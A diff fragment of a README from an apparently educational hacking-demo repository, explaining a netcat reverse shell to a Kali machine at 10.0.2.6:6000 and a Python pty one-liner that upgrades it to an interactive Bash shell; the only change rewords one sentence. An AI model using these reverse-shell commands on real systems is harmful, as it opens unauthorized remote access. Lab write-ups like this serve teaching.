cristinavisentin/hackingdemo/README.md

 - `-e /bin/bash` specifies the program to execute after connection, which is a shell Bash
 - `10.0.2.6 6000` are just hostname and port number of the server side.

 The attempt is to establish a remote Bash shell on Kali virtual machine, but the spawned process is only a basic Sh shell.
-In order to have a more versatile and powerful one, on the server side of the connection the following text line is written:
+In order to have a more powerful and interactive one, on the server side of the connection the following text line is written:

 ```bash
 python -c 'import pty;pty.spawn("/bin/bash")'